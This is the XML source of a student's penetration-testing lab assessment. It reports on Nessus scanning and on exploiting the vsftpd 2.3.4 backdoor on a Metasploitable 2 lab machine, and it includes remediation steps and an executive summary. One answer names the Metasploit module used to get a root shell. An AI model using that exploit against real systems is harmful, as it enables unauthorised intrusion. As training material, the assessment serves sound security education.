              <w:t xml:space="preserve">How was it exploited?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F4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit Framework was used to exploit the vulnerable FTP service. -=The exploit module </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/unix/ftp/vsftpd_234_backdoor</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> was selected, the target IP was configured, and the exploit successfully opened a Meterpreter shell session.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F5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">What is the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F6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">An attacker can gain remote root access to the system.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This may allow stealing data, installing malware, modifying files, or taking complete control of the machine.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F8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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F9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pt1_exploit_result.png</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">pt1_post_commands.png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ada" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="110.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommended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10.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">i)Upgrade or remove the vulnerable vsftpd 2.3.4 service.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ii)Apply the latest security patches and updates.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">iii)Disable unnecessary FTP services and restrict remote access using firewall rules.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:spacing w:before="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:spacing w:before="160" w:lineRule="auto"/>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4–6 sentence Executive Summary of this penetration test — write it for a non-technical manager who needs to understand the risk:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="aaaaaa" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="140" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="073763"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A penetration test was performed on the Metasploitable 2 target machine using Kali Linux and Metasploit Framework. During the test, a critical vulnerability was identified in the vsftpd 2.3.4 FTP service running on port 21. The vulnerability was successfully exploited, allowing remote root access to the system. This demonstrates that an attacker could fully compromise the machine and access sensitive information. The risk level of this vulnerability is critical and should be fixed immediately. Updating vulnerable services and improving system security settings are strongly recommended. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="aaaaaa" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="140" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:spacing w:before="260" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f4e79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MARKS SUMMARY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360"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1400"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="5360"/>
            <w:gridCol w:w="14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05">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>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06">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07">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Max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08">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Marks Given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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VA-1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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure and Run Nessus Scan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jc w:val="cente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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VA-2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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Analyse Nessus Findings &amp; Report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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">30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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PT-1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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploitation with Metasploit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3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">30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5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PT-2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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Short PT Report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jc w:val="cente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11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b w:val="1"/>
                <w:bCs w:val="1"/>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11B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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tl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:spacing w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8x7hcdz6s6hy" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:spacing w:before="80" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instructor Signature: ____________________________</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="2e7d32" w:space="1" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="220" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2e7d32"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCREENSHOT SUBMISSION CHECKLIST</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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attach all screenshots in a folder named: StudentID_Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:spacing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60"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1600"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="5960"/>
            <w:gridCol w:w="18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d32" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshot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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Required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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">va1_scan_config.png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7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VA Task 1, Q1</w:t>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8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">va1_scan_summary.png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A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VA Task 1, Q2</w:t>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B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">va2_critical_finding.png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D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VA Task 2, Q1</w:t>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E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">va2_medium_finding.png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30">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">VA Task 2, Q2</w:t>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31">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pt1_exploit_result.png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33">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PT Task 1</w:t>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34">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pt1_post_commands.png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36">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PT Task 1, Q3</w:t>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37">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:spacing w:before="80" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— END OF PROJECT QUESTION PAPER —</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId12" w:type="default"/>
      <w:footerReference r:id="rId1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color="2e75b6" w:space="1" w:sz="4" w:val="single"/>
      </w:pBdr>
      <w:jc w:val="center"/>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of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color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve"> | Advanced Penetration Testing Engineer-Hands On | CYBERSECURITY PROJECT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bottom w:color="2e75b6" w:space="1" w:sz="4" w:val="single"/>
      </w:pBdr>
      <w:jc w:val="right"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Cybersecurity Practical Assessment  |  Kali Linux &amp; Nessus Essentials  |  Metasploitable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300" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>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00" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>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i w:val="1"/>
      <w:iCs w:val="1"/>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eyJoZGlkIjoiNTk1YmJlZmVjNTZlNzM0M2IzYjQ5MDYyZjEzZTgwN2MiLCJ1c2VySWQiOiIzMTYxMDk5MzUxNDc3In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.26372</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>2AC9089B652045A99CCC38BA269E983F_12</vt:lpwstr>
  </property>
</Properties>
</file>